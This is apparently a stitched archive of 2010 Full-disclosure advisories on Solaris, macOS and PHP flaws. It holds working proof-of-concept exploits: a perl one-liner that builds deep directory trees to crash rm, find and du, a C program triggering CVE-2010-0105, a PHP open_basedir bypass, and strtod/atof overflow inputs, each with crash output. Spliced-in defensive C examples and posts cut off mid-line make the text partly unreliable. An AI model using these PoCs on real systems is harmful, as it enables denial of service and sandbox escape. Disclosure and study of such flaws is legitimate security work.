printf("%s", fconvert((double)1,atoi(argv[1]),&a,&b,number));
return 0;
}

# /usr/local/bin/gcc -o jaja2 jaja2.c
# ./jaja2 512
Segmentation fault (core dumped)
# /usr/local/bin/gdb -q jaja2
(no debugging symbols found)
(gdb) r 512
Starting program: /jaja2 512
(no debugging symbols found)
(no debugging symbols found)

Program received signal SIGSEGV, Segmentation fault.
0xfeeab05c in fconvert () from /lib/libc.so.1
(gdb) i r
eax            0x8047240        134509120
ecx            0x3250           12880
edx            0x8048000        134512640
ebx            0xfef9e000       -17178624
esp            0x8044b38        0x8044b38
ebp            0x8044d68        0x8044d68
esi            0x200            512
edi            0x0              0
eip            0xfeeab05c       0xfeeab05c
eflags         0x10206          [ PF IF RF ]
cs             0x3b             59
ss             0x43             67
ds             0x43             67
es             0x43             67
fs             0x0              0
gs             0x1c3            451
(gdb) x/x $edx
0x8048000:  Cannot access memory at address 0x8048000
(gdb)
- ---

The same result can be obtained with perl(1):

PoC perl:
- ---
#!/usr/local/bin/perl
printf "%.512f", 1;
# perl pss.pl
Segmentation Fault - core dumped
# /usr/local/bin/gdb -q perl
(no debugging symbols found)
(gdb) r pss.pl
Starting program: /usr/bin/perl pss.pl
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no d
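
The *convert(3C) functions write ndigit+1 bytes into a caller buffer whose size they never learn, which is how fconvert(..., 512, ..., number) with "char number[1]" ends up writing past the stack frame. As an added example (not Solaris libc code), the block below reimplements fconvert's output contract, a digit string plus decimal-point position plus sign, on top of snprintf(3) with an explicit buffer size, so that a request that does not fit is refused instead of overflowing. The function names are this example's own.

```c
/* Added example, not Solaris libc code: fconvert's output contract (digit
 * string, decimal-point position, sign) rebuilt on snprintf(3) with an
 * explicit buffer size. A request whose digits would not fit is refused
 * rather than written past the buffer. Names are this example's own. */
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Returns buf on success, NULL if the digits (NUL included) would not fit in
 * bufsz or on invalid arguments. decpt is the number of digits before the
 * decimal point (zero or negative for values below 0.1: the man page's
 * ".0314" gives "314" and -1); sign is nonzero for negative input. Leading
 * zeros are dropped, so a value that rounds to zero yields "". */
char *bounded_fconvert(double value, int ndigit, int *decpt, int *sign,
                       char *buf, size_t bufsz)
{
    if (ndigit < 0 || !decpt || !sign || !buf || bufsz == 0)
        return NULL;
    *sign = value < 0 ? 1 : 0;
    double mag = value < 0 ? -value : value;

    /* Size the fixed-point text first: the integer part alone can run to
     * ~310 digits for large doubles, so ndigit does not bound it. */
    int need = snprintf(NULL, 0, "%.*f", ndigit, mag);
    if (need < 0) return NULL;
    char *tmp = malloc((size_t)need + 1);
    if (!tmp) return NULL;
    snprintf(tmp, (size_t)need + 1, "%.*f", ndigit, mag);   /* "III.FFF" */

    char *dot = strchr(tmp, '.');
    *decpt = dot ? (int)(dot - tmp) : (int)strlen(tmp);
    size_t out = 0;
    bool leading = true;
    for (const char *p = tmp; *p; p++) {
        if (*p == '.') continue;
        if (leading && *p == '0') { (*decpt)--; continue; }  /* drop leading 0s */
        leading = false;
        if (out + 1 >= bufsz) { free(tmp); return NULL; }    /* would overflow */
        buf[out++] = *p;
    }
    free(tmp);
    buf[out] = '\0';
    if (out == 0) *decpt = 0;                                 /* value is zero */
    return buf;
}

/* Run one conversion and compare against the expected digits, decpt and
 * sign; want_digits == NULL means "expect a refusal". */
bool fconvert_check(double value, int ndigit, size_t bufsz,
                    const char *want_digits, int want_decpt, int want_sign)
{
    char buf[64];
    int decpt = 0, sign = 0;
    if (bufsz > sizeof buf) bufsz = sizeof buf;
    char *r = bounded_fconvert(value, ndigit, &decpt, &sign, buf, bufsz);
    if (want_digits == NULL)
        return r == NULL;
    return r == buf && strcmp(buf, want_digits) == 0
        && decpt == want_decpt && sign == want_sign;
}

int main(void)
{
    char buf[8];
    int decpt, sign;
    /* The jaja2.c call shape from the advisory: 512 digits into 1 byte. */
    printf("fconvert(1.0, 512) into 1 byte -> %s\n",
           bounded_fconvert(1.0, 512, &decpt, &sign, buf, 1) ? "written" : "refused");
    if (bounded_fconvert(3.14159, 2, &decpt, &sign, buf, sizeof buf))
        printf("3.14159, 2 digits -> \"%s\" decpt=%d sign=%d\n", buf, decpt, sign);
    return 0;
}
```

The zero case mirrors why jaja.c with (double)0 survived a 512-digit request: every digit is a leading zero, nothing is stored, and the buffer is untouched. With a non-zero value the same request produces at least one digit, and an API that knows the buffer size can say no at that point, which the libc routine cannot.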

[Full-disclosure] Sun Solaris 10 filesystem rm(1), find(1), etc, Denial-of-service

2010-05-21 Thread Maksymilian Arciemowicz
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[ Sun Solaris 10 filesystem rm(1),find(1),etc, Denial-of-service ]

Author: Maksymilian Arciemowicz
SecurityReason.com
Date:
- - Dis.: 17.04.2010
- - Pub.: 21.05.2010

Affected Software:
- - Sun Solaris 10 10/09

Original URL:
http://securityreason.com/achievement_securityalert/85


- --- 0.Description ---
Solaris is a Unix operating system introduced by Sun Microsystems in
1992 as the successor to SunOS.

Sun Microsystems, Inc. is a wholly owned subsidiary of Oracle
Corporation, selling computers, computer components, computer software,
and information technology services. Sun was founded on February 24,
1982. The company was headquartered in Santa Clara, California (part of
Silicon Valley), on the former west campus of the Agnews Developmental
Center.

In computing, ZFS is a combined file system and logical volume manager
designed by Sun Microsystems. The features of ZFS include support for
high storage capacities, integration of the concepts of filesystem and
volume management, snapshots and copy-on-write  clones, continuous
integrity checking and automatic repair, RAID-Z and native NFSv4 ACLs.


- --- 1. Sun Solaris 10 filesystem rm(1),find(1),etc, Denial-of-service  ---
We can create a deep tree, and when we remove, scan or do something else
with this tree, the affected program will crash with a stack overflow symptom.

PoC:
# perl -e '$a="X";for(1..8000){ ! -d $a and mkdir $a and chdir $a }'

We need to use 1..8000 or a bigger value to cause the stack overflow.

in result

# du X
Segmentation fault (core dumped)
# /usr/local/bin/gdb -q du
(no debugging symbols found)
(gdb) r X
Starting program: /usr/bin/du X
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)

Program received signal SIGSEGV, Segmentation fault.
0xfeedfc8a in _ndoprnt () from /lib/libc.so.1
(gdb) x/i $eip
0xfeedfc8a <_ndoprnt+12>:   push   %ebp

We can simply remove this dir for 1..8000:

# rm -rf X
#

but let's try to create this:

# perl -e '$a="Y";for(1..5){ ! -d $a and mkdir $a and chdir $a }'
# rm -rf Y
Segmentation fault (core dumped)

rm(1) has failed!

What is wrong? A stack overflow.

# /usr/local/bin/gdb -q rm
(no debugging symbols found)
(gdb) r -rf Y
Starting program: /usr/bin/rm -rf Y
(no debugging symbols found)
(no debugging symbols found)

Program received signal SIGSEGV, Segmentation fault.
0x08051c03 in ?? ()
(gdb) x/i $eip
0x8051c03:  push   %ebx

# find Y CX >> /dev/null
Segmentation fault (core dumped)


find(1) also fails!

# /usr/local/bin/gdb -q find
(no debugging symbols found)
(gdb) r Y CX >> /dev/null
Starting program: /usr/bin/find Y CX >> /dev/null
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)

Program received signal SIGSEGV, Segmentation fault.
0xfeecfc8a in _ndoprnt () from /lib/libc.so.1
(gdb) x/i $eip
0xfeecfc8a <_ndoprnt+12>:   push   %ebp


- --- 2. Fix ---
Sun Solaris will fix this issue.


- --- 3. Greets ---
sp3x Infospec pi3


- --- 4. Contact ---
Author: SecurityReason.com [ Maksymilian Arciemowicz ]
Email:
- - cxib {a\./t] securityreason [d=t} com

GPG:
- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg

http://securityreason.com/
http://securityreason.com/exploit_alert/ - Exploit Database
http://securityreason.com/security_alert/ - Vulnerability Database

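As an added example (not part of the advisory), the defender's side of the same trap: a directory walk that never recurses and refuses trees deeper than a cap, so a planted X/X/X/... chain costs one descriptor per level rather than one stack frame per level, as it does in the recursive rm(1), find(1) and du(1) above. The helpers build and remove a test chain under /tmp (assumed writable) with the *at() calls, so absolute path length never matters; the names and limits are constructed for the demonstration.

```c
#define _POSIX_C_SOURCE 200809L
#include <dirent.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Build root/X/X/X/... `levels` deep with mkdirat(), the shape of the perl
 * one-liner above, without ever forming a long absolute path. */
int make_chain(const char *root, int levels)
{
    int fd = open(root, O_RDONLY | O_DIRECTORY);
    if (fd < 0) return -1;
    for (int i = 0; i < levels; i++) {
        if (mkdirat(fd, "X", 0700) != 0 && errno != EEXIST) { close(fd); return -1; }
        int child = openat(fd, "X", O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
        close(fd);
        if (child < 0) return -1;
        fd = child;
    }
    close(fd);
    return 0;
}

/* Iterative, depth-capped walk: returns the deepest nesting below root, or
 * -1 with errno = ELOOP as soon as more than `limit` levels are seen. The
 * only per-level state is one DIR* in a heap array, so a hostile tree costs
 * one descriptor per level instead of one stack frame per level. */
long max_nesting(const char *root, int limit)
{
    DIR **stack = calloc((size_t)limit + 1, sizeof *stack);
    if (!stack) return -1;
    stack[0] = opendir(root);
    if (!stack[0]) { free(stack); return -1; }
    int top = 0;
    long deepest = 0;
    while (top >= 0) {
        struct dirent *de = readdir(stack[top]);
        if (!de) { closedir(stack[top--]); continue; }        /* exhausted: pop */
        if (!strcmp(de->d_name, ".") || !strcmp(de->d_name, "..")) continue;
        int pfd = dirfd(stack[top]);
        struct stat st;
        if (fstatat(pfd, de->d_name, &st, AT_SYMLINK_NOFOLLOW) != 0 || !S_ISDIR(st.st_mode))
            continue;                                          /* not a directory */
        if (top + 1 > limit) {                                 /* refuse to go deeper */
            while (top >= 0) closedir(stack[top--]);
            free(stack);
            errno = ELOOP;
            return -1;
        }
        int fd = openat(pfd, de->d_name, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
        DIR *d = fd < 0 ? NULL : fdopendir(fd);
        if (!d) { if (fd >= 0) close(fd); continue; }
        stack[++top] = d;
        if (top > deepest) deepest = top;
    }
    free(stack);
    return deepest;
}

/* Remove a chain built by make_chain(), deepest directory first, again without
 * recursion: re-descend from root for every level (quadratic, fine for a test). */
int remove_chain(const char *root, int levels)
{
    for (int n = levels; n > 0; n--) {
        int fd = open(root, O_RDONLY | O_DIRECTORY);
        if (fd < 0) return -1;
        for (int i = 1; i < n; i++) {
            int child = openat(fd, "X", O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
            close(fd);
            if (child < 0) return -1;
            fd = child;
        }
        int rc = unlinkat(fd, "X", AT_REMOVEDIR);
        close(fd);
        if (rc != 0) return -1;
    }
    return 0;
}

/* Round trip in a fresh temporary directory: returns the depth measured for a
 * `levels`-deep chain (expected == levels), or -1 if anything fails, including
 * the cap NOT tripping when it is set to half the real depth. */
long self_check(int levels)
{
    char tmpl[] = "/tmp/deeptree.XXXXXX";   /* constructed test root, /tmp assumed writable */
    if (!mkdtemp(tmpl)) return -1;
    long depth = -1;
    if (make_chain(tmpl, levels) == 0) {
        depth = max_nesting(tmpl, levels + 8);
        if (max_nesting(tmpl, levels / 2) != -1) depth = -1;
    }
    if (remove_chain(tmpl, levels) != 0 || rmdir(tmpl) != 0) depth = -1;
    return depth;
}
```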


[Full-disclosure] Sun Solaris 10 ftpd Cross-site request forgery

2010-05-21 Thread Maksymilian Arciemowicz

[ Sun Solaris 10 ftpd Cross-site request forgery ]

Author: Maksymilian Arciemowicz
SecurityReason.com
Date:
- - Dis.: 24.02.2010
- - Pub.: 21.05.2010

Affected Software:
- - Sun Solaris 10 10/09
- - OpenSolaris 2009.06

Original URL:
http://securityreason.com/achievement_securityalert/84


- --- 0.Description ---
in.ftpd is the Internet File Transfer Protocol (FTP) server process. The
server may be invoked by the Internet daemon inetd(1M)  each time a
connection to the FTP service is made or run as a standalone server.

CWE-352:
When a web server is designed to receive a request from a client without
any mechanism for verifying that it was intentionally sent, then it
might be possible for an attacker to trick a client into making an
unintentional request to the web server which will be treated as an
authentic request. This can be done via a URL, image load,
XMLHttpRequest, etc. and can result in data disclosure or unintended
code execution.


- --- 1. Sun Solaris 10 ftpd Cross-site request forgery ---
The main problem exists in dividing a long command into a few other ones. The
problem stems from the use of the for(;;) loop and the fgets() function, etc.

Example:
ftp://ftp.sun.com
//
/stat


or

ftp://ftp.sun.com

[Full-disclosure] MacOS X 10.6.3 filesystem hfs Denial of Service Vulnerability

2010-04-23 Thread Maksymilian Arciemowicz

[ MacOS X 10.6.3 filesystem hfs Denial of Service Vulnerability ]

Author: Maksymilian Arciemowicz
http://SecurityReason.com
Date:
- - Dis.: 01.04.2010
- - Pub.: 23.04.2010

CVE: CVE-2010-0105
Risk: Medium

Affected Software:
- - MacOS 10.6 (tested on 1062 and 1063)

NOTE: Prior versions may also be affected.

Original URL:
http://securityreason.com/achievement_securityalert/83


- --- 0.Description ---
Mac OS is the trademarked name for a series of graphical user
interface-based operating systems developed by Apple Inc. (formerly
Apple Computer,  Inc.) for their Macintosh line of computer systems. The
Macintosh user experience is credited with popularizing the graphical
user interface. The original form of what Apple would later name the
"Mac OS" was the integral and unnamed system software first introduced
in 1984 with the original Macintosh, usually referred to simply as the
System software.


- --- 1. MacOS X 10.6.3 filesystem hfs Denial of Service ---
The main problem exists in the implementation of the filesystem (hfs). MacOS X
10.6.3 has hfs as its default filesystem, so the problem arises when we create
a special structure with hardlinks.

Interesting information is on Wikipedia:

http://en.wikipedia.org/wiki/Hard_link

- ---
...
Most modern operating systems don't allow hard links on directories to
prevent endless recursion. A notable exception to this is Mac OS X v10.5
(Leopard) which uses hard links on directories for the Time Machine
backup mechanism only.
...
- ---

In 10.6 we can't use the ln(1) command to create a hardlink to a directory
(example: # ln C/C CX ). Anyway, we can use the link(3) function, and we
don't need any special privileges! It sounds nice to exploit it.. let's try.

To show this issue, we need to use this program:
( http://securityreason.com/achievement_exploitalert/15 )

- --- hfs_poc.c ---
/*  Proof of Concept for CVE-2010-0105
MacOS X 10.6 hfs file system attack (Denial of Service)
by Maksymilian Arciemowicz from SecurityReason.com

http://securityreason.com/achievement_exploitalert/15

NOTE:

This DoS is triggered in the phase

Checking multi-linked directories

so we need to activate it with the line

connlink("C/C","CX");

Then we need to create a PATH_MAX/2 deep directory tree to make the overflow,

and we should see diskutil and fsck_hfs exit with sig=8

~ x$ diskutil verifyVolume /Volumes/max2
Started filesystem verification on disk0s3 max2
Performing live verification
Checking Journaled HFS Plus volume
Checking extents overflow file
Checking catalog file
Checking multi-linked files
Checking catalog hierarchy
Checking extended attributes file
Checking multi-linked directories
Maximum nesting of folders and directory hard links reached
The volume max2 could not be verified completely
Error: -9957: Filesystem verify or repair failed
Underlying error: 8: POSIX reports: Exec format error


*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>

/* mkdir() the given name relative to the current directory, or abort */
int createdir(char *name){
	if(0!=mkdir(name,((S_IRWXU | S_IRWXG | S_IRWXO) & ~umask(0))| S_IWUSR
	|S_IXUSR)){
		printf("Can`t create %s: %s\n", name, strerror(errno));
		exit(1);
	}
	return 0;
}

/* chdir() into the given name, or abort */
int comein(char *name){
	if(0!=chdir(name)){
		printf("Can`t chdir in to %s: %s\n", name, strerror(errno));
		exit(1);
	}
	return 0;
}

/* link(2) a to b; on 10.6 this succeeds for a directory although ln(1) refuses */
int connlink(char *a, char *b)
{
	if(0!=link(a,b)){
		printf("Can`t create link %s => %s: %s\n",a,b,strerror(errno));
		exit(1);
	}
	return 0;
}

int main(int argc,char *argv[]){

	int level;

	if(argc==2) {
		level=atoi(argv[1]);
	}else{
		level=512; //default: PATH_MAX/2 levels
	}
	createdir("C");   //create the directory pair the hard link will point at
	createdir("C/C");

	connlink("C/C","CX"); //we need the directory hard link to reach "Checking multi-linked directories"

	comein("C");

	/* create and enter one level at a time; the two calls are sequenced
	 * explicitly because C does not define the evaluation order of
	 * printf() arguments, so the chdir could otherwise run before the mkdir */
	while(level--){
		int m=createdir("C");
		int c=comein("C");
		printf("Level: %i mkdir:%i chdir:%i\n",level,m,c);
	}

	printf("check diskutil verifyVolume /\n");
	return 0;
}

- --- hfs_poc.c ---

or use

- --- last.c ---
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

/* function mkpath() from mkdir(1)/netbsd
 * Copyright for mkdir.c (c) 1983, 1992, 1993
 *  The Regents of the University of Califo

Re: [Full-disclosure] PHP 5.2.12/5.3.1 session.save_path safe_mode and open_basedir bypass

2010-02-12 Thread Maksymilian Arciemowicz
Christian Sciberras wrote:
> What exactly are the implications of this?
> Surely no one [website] accepts paths.
> 

safe_mode and open_basedir are usually used by small providers. Of course,
it is idiotic to use safe_mode and open_basedir when we can bypass them via
symlinks.

-- 
Best Regards,

pub   1024D/A6986BD6 2008-08-22
uid  Maksymilian Arciemowicz (cxib)

sub   4096g/0889FA9A 2008-08-22

http://securityreason.com
http://securityreason.com/key/Arciemowicz.Maksymilian.gpg




[Full-disclosure] PHP 5.2.12/5.3.1 session.save_path safe_mode and open_basedir bypass

2010-02-11 Thread Maksymilian Arciemowicz
[ PHP 5.2.12/5.3.1 session.save_path safe_mode and open_basedir bypass ]

Credit: Grzegorz Stachowiak
Provided by: SecurityReason.com
Date:
- Written: 31.01.2010
- Public:  11.02.2010

SecurityRisk: Medium
Affected Software:
PHP 5.2.12
PHP 5.3.1

Advisory URL: http://securityreason.com/achievement_securityalert/82
Vendor: http://www.php.net

--- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is
borrowed from C, Java and Perl with a couple of unique PHP-specific
features thrown in. The goal of the language is to allow web developers
to write dynamically generated pages quickly.

A visitor accessing your web site is assigned a unique id, the so-called
session id. This is either stored in a cookie on the user side or is
propagated in the URL.

session.save_path defines the argument which is passed to the save
handler. If you choose the default files handler, this is the path where
the files are created. Defaults to /tmp. See also session_save_path().

There is an optional N argument to this directive that determines the
number of directory levels your session files will be spread around in.
For example, setting to '5;/tmp' may end up creating a session file and
location like /tmp/4/b/1/e/3/sess_4b1e384ad74619bd212e236e52a5a174If .
In order to use N you must create all of these directories before use. A
small shell script exists in ext/session to do this, it's called
mod_files.sh. Also note that if N is used and greater than 0 then
automatic garbage collection will not be performed, see a copy of
php.ini for further information. Also, if you use N, be sure to surround
session.save_path in "quotes" because the separator (;) is also used for
comments in php.ini.

--- 1. session.save_path safe mode and open basedir bypass ---
session.save_path can be set via the ini_set() and session_save_path()
functions. session.save_path should contain the path where you will save
your tmp files. But the syntax for session.save_path is:

[/PATH]

OR

[N;/PATH]

N - can also be a string (N should be numeric).

EXAMPLES:

1. session_save_path("/DIR/WHERE/YOU/HAVE/ACCESS")
2. session_save_path("5;/DIR/WHERE/YOU/HAVE/ACCESS")

The main problem comes when we use multiple ';' characters and when we
create a fake directory structure to reduce '../'.

Proof of Concept:
0. Create directories:

/humhum

and

/byp

1. set open_basedir = /byp
2. create test.php
<?php

session_save_path("/humhum");
session_start();
?>
3. php test.php

Warning: session_save_path(): open_basedir restriction in effect.
File(/humhum) is not within the allowed path(s): (/byp) in /byp/test.php
on line 3
4. subdir.php
<?php
mkdir("puf");
mkdir(";a");
?>
5. php subdir.php
6. cd puf
7. create byp.php
<?php

session_save_path(";;/byp/;a/../../humhum");
session_start();

?>
8. php byp.php
9. ls /humhum
sess_d905eb71c9ad65ce2a845cdb0fed3016

The main problem is located in session.c. PHP doesn't check that we
have used a further ';' after the first one. By creating a fake directory structure

mkdir ';a'
mkdir '../;a'

we can reduce the directory level using '../'.

--- 2. Fix ---
Revision 294272
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/session/session.c?view=log
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/ext/session/session.c?view=log

--- 3. Credit ---
Found by: Grzegorz Stachowiak
Written by: Maksymilian Arciemowicz
Fixed by  : Ilia Alshanetsky

--- 4. Contact ---
Email:
- Grzegorz.Stachowiak
stachowiak [a,t} analogicode (d_0t} pl

- Maksymilian Arciemowicz
cxib {a.t] securityreason [d0_t} com

GPG:
http://securityreason.com/key/Arciemowicz.Maksymilian.gpg

http://securityreason.com/
http://securityreason.com/exploit_alert/ - Exploit Database
http://securityreason.com/security_alert/ - Vulnerability Database




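An added illustration, not PHP's code: a lexical model of the open_basedir decision that contrasts the bypassed pattern (check whatever follows the first ';') with a strict rule (the text before the only ';' must be digits, and the exact directory the files handler will use is canonicalised before it is compared against the base). The cwd /byp/puf, base /byp and the crafted string are the ones from the PoC above; how the two checkers behave is an assumption made for the demonstration, not a transcription of session.c.

```c
#include <stdio.h>
#include <string.h>

/* Resolve `path` against `cwd` purely lexically ("." and ".." only, no
 * symlink lookup) into `out`. Returns 0, or -1 if the result does not fit. */
int lexical_resolve(const char *cwd, const char *path, char *out, size_t outlen)
{
    char buf[1024];
    const char *parts[128];
    int n = 0;
    /* relative paths start from cwd, absolute ones from "/" */
    if (snprintf(buf, sizeof buf, "%s/%s", path[0] == '/' ? "" : cwd, path) >= (int)sizeof buf)
        return -1;
    for (char *tok = strtok(buf, "/"); tok; tok = strtok(NULL, "/")) {
        if (strcmp(tok, ".") == 0) continue;
        if (strcmp(tok, "..") == 0) { if (n > 0) n--; continue; }
        if (n == 128) return -1;
        parts[n++] = tok;
    }
    if (n == 0) return snprintf(out, outlen, "/") < (int)outlen ? 0 : -1;
    size_t used = 0;
    for (int i = 0; i < n; i++) {
        int w = snprintf(out + used, outlen - used, "/%s", parts[i]);
        if (w < 0 || (size_t)w >= outlen - used) return -1;
        used += (size_t)w;
    }
    return 0;
}

/* 1 if `resolved` equals `base` or lies beneath it (both canonical, no trailing '/') */
int under_basedir(const char *base, const char *resolved)
{
    size_t bl = strlen(base);
    return strncmp(base, resolved, bl) == 0 && (resolved[bl] == '\0' || resolved[bl] == '/');
}

/* The bypassed pattern (modelled, not PHP's code): treat whatever follows the
 * FIRST ';' as the directory and check that, while the files handler later
 * uses whatever follows the LAST ';'. Returns 1 if this check is satisfied. */
int check_after_first_semicolon(const char *cwd, const char *base, const char *save_path)
{
    const char *p = strchr(save_path, ';');
    char resolved[1024];
    if (lexical_resolve(cwd, p ? p + 1 : save_path, resolved, sizeof resolved) != 0) return 0;
    return under_basedir(base, resolved);
}

/* Strict rule: everything before the last ';' must be digits (the N
 * directory-depth argument, so a second ';' is rejected outright), and the
 * directory that is checked is exactly the one the handler will use.
 * Returns 1 if save_path is acceptable. */
int strict_save_path_ok(const char *cwd, const char *base, const char *save_path)
{
    const char *dir = save_path;
    const char *last = strrchr(save_path, ';');
    if (last) {
        for (const char *q = save_path; q < last; q++)
            if (*q < '0' || *q > '9') return 0;
        dir = last + 1;
    }
    char resolved[1024];
    if (lexical_resolve(cwd, dir, resolved, sizeof resolved) != 0) return 0;
    return under_basedir(base, resolved);
}
```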

Re: [Full-disclosure] MacOS X 10.5/10.6 libc/strtod(3) buffer overflow

2010-01-11 Thread Maksymilian Arciemowicz
I have not checked this issue in macos 10.4. In MacOS 10.1 it does not
work. But the perl script (in macos 10.5)

Chujwamwmuzg.pl ---
#!/usr/local/bin/perl
printf "% 0.4194310f", 0x0.0x41414141;
Chujwamwmuzg.pl ---

will crash with
esi = 0x41414141
edi = 0x15

Other bugs in libc also work on new versions of macos, for example the
overflow in the FTSENT structure:

http://securityreason.com/achievement_securityalert/60
http://securityreason.com/achievement_securityalert/68

We confirmed this issue in MacOS 10.1.


> Joshua Levitsky wrote:
> and it then rebooted my mac :)
> 
> On Mon, Jan 11, 2010 at 1:57 PM, Joshua Levitsky  <mailto:jlevi...@joshie.com>> wrote:
> 
> The below hosed my terminal session on 10.4.11... I did this in a
> >console login so don't have the results.. You need? or is dropping
> me to a blue screen and lack of system response good? 
> 
> #!/usr/local/bin/perl
> printf "%0.4194310f", 0x0.0x41414141;
> 
> 
> Perl will crash with
> esi = 0x41414141
> edi = 0x15
> 
> -Josh

-- 
Best Regards,
--------
pub   1024D/A6986BD6 2008-08-22
uid  Maksymilian Arciemowicz (cxib)

sub   4096g/0889FA9A 2008-08-22

http://securityreason.com
http://securityreason.com/key/Arciemowicz.Maksymilian.gpg




Re: [Full-disclosure] MacOS X 10.5/10.6 libc/strtod(3) buffer overflow

2010-01-11 Thread Maksymilian Arciemowicz
Joshua Levitsky wrote:
> On Thu, Jan 7, 2010 at 7:20 PM, Maksymilian Arciemowicz
> mailto:c...@securityreason.com>> wrote:
> 
> [ MacOS X 10.5/10.6 libc/strtod(3) buffer overflow ]
> 
> Author: Maksymilian Arciemowicz and sp3x
> http://SecurityReason.com
> 
> CVE: CVE-2009-0689
> CWE: CWE-119
> Risk: High
> Remote: Yes
> 
> 
> I tested doing "printf %1.262159f 1.1" in a shell login on 10.4.11 and
> it took out my session. I imagine this means 10.4.11 is vulnerable as
> well no? Tiger is still very popular in enterprise environments that are
> slow to upgrade.
> 
> -- 
> Joshua Levitsky, MCSE, CISSP
> http://www.jnuxhosting.net
> http://www.jnux.net
> http://blog.joshie.com/
> [5957 F27C 9C71 E9A7 274A 0447 C9B9 75A4 9B41 D4D1]
> 

Could you check the perl PoC?
It should overwrite the esi and edi registers:

esi=0x41414141
edi=15

-- 
Best Regards,
----
pub   1024D/A6986BD6 2008-08-22
uid  Maksymilian Arciemowicz (cxib)

sub   4096g/0889FA9A 2008-08-22

http://securityreason.com
http://securityreason.com/key/Arciemowicz.Maksymilian.gpg




[Full-disclosure] MacOS X 10.5/10.6 libc/strtod(3) buffer overflow

2010-01-08 Thread Maksymilian Arciemowicz
[ MacOS X 10.5/10.6 libc/strtod(3) buffer overflow ]

Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- Dis.: 07.05.2009
- Pub.: 08.01.2010

CVE: CVE-2009-0689
CWE: CWE-119
Risk: High
Remote: Yes

Affected Software:
- MacOS 10.6

NOTE: Prior versions may also be affected.

Original URL:
http://securityreason.com/achievement_securityalert/81


--- 0.Description ---
Mac OS is the trademarked name for a series of graphical user
interface-based operating systems developed by Apple Inc. (formerly
Apple Computer, Inc.) for their Macintosh line of computer systems. The
Macintosh user experience is credited with popularizing the graphical
user interface. The original form of what Apple would later name the
"Mac OS" was the integral and unnamed system software first introduced
in 1984 with the original Macintosh, usually referred to simply as the
System software.


--- 1. MacOS X 10.5/10.6 libc/strtod(3) buffer overflow ---
The main problem exists in the dtoa implementation. MacOS X has the same dtoa
as OpenBSD, NetBSD etc. This problem affects not only libc/gdtoa.
The strtod(3) function is also affected.
For more information, please see SREASONRES:20090625.

http://securityreason.com/achievement_securityalert/63

but the fix for SREASONRES:20090625 used by OpenBSD was not good.
More information about the fix for OpenBSD and similar systems is in SREASONRES:20091030,

http://securityreason.com/achievement_securityalert/69

We can create a floating-point number that will overwrite the memory. Kmax
is defined as 15. Functions in dtoa don't check the Kmax limit, and
it is possible to access elements >= 16 of the freelist array.

It is true that the examples presented in the previous notes, using
printf(1), do not work under MacOS X. This does not mean the MacOS X C
library is safe.

More:
http://cwe.mitre.org/data/definitions/119.html


--- 2. Proof of Concept (PoC) ---
--- 2.1. strtod(3) buffer overflow example PoC ---
#include <stdio.h>
#include <stdlib.h>

int main ()
{

char number[] = "0.11...11", *e;

double weed = strtod(number, &e);

printf("grams = %lf\n", weed);
return 0;

}

(gdb) r
Starting program: /Volumes/ARC/299
Reading symbols for shared libraries ++. done

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x0039f000
0x002271ac in __diff_D2A ()

(gdb) i r

eax0xc71c71c7   -954437177
ecx0xacb44  707396
edx0x0  0
ebx0x2c2e4f 2895439
esp0xbffb65d0   0xbffb65d0
ebp0xbffb6618   0xbffb6618
esi0x39f000 3796992
edi0x0  0
eip0x2271ac 0x2271ac <__diff_D2A+246>
eflags 0x10246  66118
cs 0x17 23
ss 0x1f 31
ds 0x1f 31
es 0x1f 31
fs 0x0  0
gs 0x37 55

edi=0x0
eax=0xc71c71c7
eip=0x002271ac

(gdb) x/i 0x002271ac
0x2271ac <__diff_D2A+246>:  mov%eax,(%esi)

--- 2.2. atof(3) buffer overflow example PoC ---
#include <stdio.h>
#include <stdlib.h>

int
main()
{
char s[]="111.11...11";

float a=atof(s);
printf("%f",a);
return 0;
}


x$ ls -la m0.c
-rwxrwxrwx@ 1 x  staff  317507 Jan  3 14:23 m0.c
x$ gcc -o m0 m0.c
x$ ./m0
Bus error

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x0039f000
0x00227017 in __lshift_D2A ()

(gdb) x/i 0x00227017
0x227017 <__lshift_D2A+68>: movl   $0x0,(%edx)
(gdb) i r
eax0x16bc   5820
ecx0x80b6   32950
edx0x39f000 3796992
ebx0x2c2e4f 2895439
esp0xbffb2070   0xbffb2070
ebp0xbffb20b8   0xbffb20b8
esi0x26bd   9917
edi0x80b7   32951
eip0x227017 0x227017 <__lshift_D2A+68>
eflags 0x10203  66051
cs 0x17 23
ss 0x1f 31
ds 0x1f 31
es 0x1f 31
fs 0x0  0
gs 0x37 55
(gdb) bt
#0  0x00227017 in __lshift_D2A ()
#1  0x002c3b74 in strtod_l$UNIX2003 ()
#2  0x00275ba7 in atof ()
#3  0x17eb in main ()


--- 3. SecurityReason Note ---
Officially SREASONRES:20090625 has been detected in:
- OpenBSD
- NetBSD
- FreeBSD
- MacOSX
- Google Chrome
- Mozilla Firefox
- Mozilla Seamonkey
- Mozilla Thunderbird
- Mozilla Sunbird
- Mozilla Camino
- KDE (example: konqueror)
- Opera
- K-Meleon
- F-Lock
- MatLab
- J

This list is not yet closed.
FreeBSD project has fixed this issue (state 2010-01-05) only in
MAIN
